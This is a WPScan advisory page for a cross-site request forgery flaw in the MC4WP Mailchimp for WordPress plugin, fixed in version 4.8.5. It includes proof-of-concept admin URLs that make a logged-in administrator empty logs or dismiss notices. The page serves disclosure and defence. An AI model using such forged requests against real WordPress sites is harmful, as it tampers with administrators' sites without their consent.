How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

MC4WP: Mailchimp for WordPress < 4.8.5 - Unauthorised Actions via CSRF

Description

The plugin did not properly check for CSRF in some of its actions handled by the listen_for_actions method (hooked as admin_init), allowing attackers to make logged in users with the manage_options capability do unwanted actions such as empty the logs, dismiss notice and so on

Proof of Concept

https://example.com/wp-admin/admin.php?_mc4wp_action=empty_debug_log
https://example.com/wp-admin/admin.php?_mc4wp_action=dismiss_review_notice
https://example.com/wp-admin/admin.php?_mc4wp_action=renew_lists_cache
https://example.com/wp-admin/admin.php?_mc4wp_action=dismiss_api_key_notice

Affects Plugins

mailchimp-for-wp

Fixed in version 4.8.5

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

e84e1fa5-a947-4b2c-a134-19e9b07385b4

Timeline

Publicly Published

2021-06-01 (about 11 months ago)

Added

2021-06-01 (about 11 months ago)

Last Updated

2021-06-01 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin